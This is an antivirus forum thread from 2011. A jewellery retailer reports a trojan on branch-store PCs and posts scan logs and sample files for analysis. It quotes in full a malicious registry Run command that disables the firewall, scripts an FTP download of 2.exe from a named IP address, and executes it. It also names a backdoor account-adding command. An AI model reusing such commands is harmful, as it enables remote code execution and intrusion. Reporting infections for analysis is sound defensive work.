net use bye xuzijianyes /add(net病毒) - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛 net use bye xuzijianyes /add(net病毒)

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

net use bye xuzijianyes /add(net病毒)

本主题由大版主 networkedition 于 2012-2-23 15:56:35 执行移动主题操作

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-05-27 22:46 \| 显示全部短消息资料字号：小中大 1楼 net use bye xuzijianyes /add(net病毒) 因为我们是做珠宝销售的，开连锁店是正常的，分店通过ADSL后，走VPN和我们总部联系，结果，就中了 net use bye xuzijianyes /add。好像叫net病毒，把我的ftp.exe搞得说系统找不到该文件，明明该文件就存在。而且，就是安装了sql 2000，并提升用户为管理员后，中招的。用了版主介绍的sreng扫描一下，随后贴上我的扫描日志，都是分店电脑。已解决：想不到我提供的木马被大版主采样了。好高兴！问题已经解决了，谢谢各位的帮助！用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.3; QQDownload 677; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; CIBA; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322; MS-RTC LM 8; AskTB5.6) 吴文和最后编辑于 2011-06-02 00:42:35
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	分享到：

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-05-28 20:46 \| 显示全部短消息资料字号：小中大 2楼回复: net use bye xuzijianyes /add(net病毒) 谢谢老大！今天值班过去用sreng2扫描后得出一个重要结果：ftp.exe原来是被映像劫持了，难怪，我从其他地方拷贝一个无问题的ftp.exe，系统却提示该文件无效，不是可以程序。后来激动，把注册表中被劫持的ftp.exe删除了，重新拷贝ftp.exe过来，一切恢复正常。忘记备份注册表。呵呵。太激动了。只是ftp.exe恢复正常而已，那个shell项直到下班也没去理会。明天继续吧。附上扫描结果。附件: sreng2.log (2011-5-28 20:45:30, 75.87 K) 该附件被下载次数 587
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-05-29 20:02 \| 显示全部短消息资料字号：小中大 3楼回复: net use bye xuzijianyes /add(net病毒) 今天过来公司值班，远程到有问题的那部电脑，发现：net use bye xuzijianyes /add已经没有了，shell项的内容变成了：c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 60.173.10.220> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 2.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&2.exe&2.exe&del cmd.txt /q /f&exi。很明显，木马就是看中了这电脑刷卡机，估计从60.173.10.220安徽铜陵电信服务器中下载2.exe放在c:\windows\system32，并且附带了sb.txt文件，该sb.txt文件图标被伪装成系统无法辨认模样，用记事本打开后，发现会下载68.exe文件，但是我搜索整个硬盘没发现，包括隐藏文件夹也没有，我马上把这2.exe sb.txt删除，然后，在C:\Documents and Settings中，将所有用户文件夹里面的cmd.txt删除。可惜的是，注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的“shell” c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 60.173.10.220> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 2.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&2.exe&2.exe&del cmd.txt /q /f&exi，我却无法删除，提示我没有修改或者删除的权限。哎，管理员权限都无法删除，这个木马制作者，实在太狠了。咱们论坛里面有没有这样的高手？（貌似这个作者写出来的这个东西最近很流行的）还有，它还会自己产生几个未知的用户：bodong,asd,全部是管理员权限的。看来，我只能重新安装系统了。附上第二次扫描结果：附件: SREngLOG.log (2011-5-29 20:10:15, 78.81 K) 该附件被下载次数 351 吴文和最后编辑于 2011-05-29 20:10:15
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-05-29 20:35 \| 显示全部短消息资料字号：小中大 4楼回复: net use bye xuzijianyes /add(net病毒) 我先传两个三个文件吧。好像都是木马来的第一个：发现的地方位于c:\windows\system32,有一个文件夹名字是1025，里面放了这两个文件附件: 新建文件夹.zip (2011-5-29 20:35:25, 554 B) 该附件被下载次数 386 第二个文件：发现的地方是在C:\Documents and Settings下每个用户的文件夹都存在。cmd.txt 附件: cmd.txt (2011-5-29 20:35:25, 57 B) 该附件被下载次数 369
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-05-30 20:52 \| 显示全部短消息资料字号：小中大 5楼回复: net use bye xuzijianyes /add(net病毒) 引用: 原帖由 networkedition 于 2011-5-30 9:55:00 发表 c:\documents and settings\all users\application data\storm\update\%youshizhuay%\lcoef.cc3 c:\documents and settings\all users\drm\%sessionname%\nqmwj.mp3 c:\documents and settings\local user\windows 小的无能为力，只找到前面两个文件，windows.dll和commtb32.dll一直未能找到。附件: 新建文件夹 (3).rar (2011-5-30 20:51:40, 250.99 K) 该附件被下载次数 635
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-05-31 17:11 \| 显示全部短消息资料字号：小中大 6楼回复: net use bye xuzijianyes /add(net病毒) 怀疑公司被入侵了。又一台电脑中招了，所有必须启动的服务已经被停止，无法启动，启动就报错。最新拷贝的可疑程序压缩包：附件: net_2.zip (2011-5-31 17:10:44, 264.66 K) 该附件被下载次数 406
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-05-31 17:35 \| 显示全部短消息资料字号：小中大 7楼回复: net use bye xuzijianyes /add(net病毒) 在c:\windows\system32下面，找到了木马作者的自我介绍：斯文哥又来抓鸡了，唉QQ413968336 斯文哥又来抓鸡了，唉QQ413968336 斯文哥又来抓鸡了，唉QQ413968336 子健哥又来抓鸡了，唉QQ413968336 子健哥又来抓鸡了，唉QQ413968336 子健哥又来抓鸡了，唉QQ413968336 子健哥又来抓鸡了，唉QQ413968336 Sun网络 www.muhuo.com 冷炫哥哥在次辉煌起来QQ 11156454. 清风可否吹走破碎的梦。附上我找到的可疑文件：附件: 新建文件夹.zip (2011-5-31 17:35:08, 802.13 K) 该附件被下载次数 323
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-05-31 17:50 \| 显示全部短消息资料字号：小中大 8楼回复: net use bye xuzijianyes /add(net病毒) 这木马真小人，放那么多东西，害我电脑什么都用不了，只能移动鼠标查看东西了。附上扫描文件：附件: SREngLOG.log (2011-5-31 17:50:23, 143.84 K) 该附件被下载次数 261
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-05-31 18:49 \| 显示全部短消息资料字号：小中大 9楼回复: net use bye xuzijianyes /add(net病毒) 我QQ号码是475553712
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:	发表于： 2011-06-01 12:08 \| 显示全部短消息资料字号：小中大 10楼回复 15F networkedition 的帖子谢谢大版主。benchi.exe估计被我删除了。而且对方系统也还原了。应该还有其他店铺电脑存在相同问题，我找到了压缩上来。这木马释放的文件太多了，我也只是找到了一部分。找到可疑文件后我也会压缩放上去。
吴文和初生襁褓狮帖子:18 注册: 2011-05-27 来自:

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT